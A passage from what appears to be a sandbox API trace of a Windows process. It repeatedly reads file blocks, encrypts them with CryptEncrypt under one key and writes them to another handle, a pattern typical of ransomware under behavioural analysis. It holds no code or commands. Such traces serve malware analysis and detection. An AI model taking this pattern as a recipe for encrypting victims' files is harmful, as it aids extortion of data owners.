hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.560] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.561] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.561] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.561] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.561] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.561] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.561] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.562] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.562] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.562] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.562] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.562] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.562] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.563] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.563] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.563] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.563] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.564] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.564] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.564] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.564] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.564] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.564] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.564] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.564] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.565] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.565] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.565] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.565] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.565] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.565] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.566] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.566] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.566] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.566] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.568] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.571] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.571] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.571] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.571] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.572] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.572] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.572] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.574] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.575] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 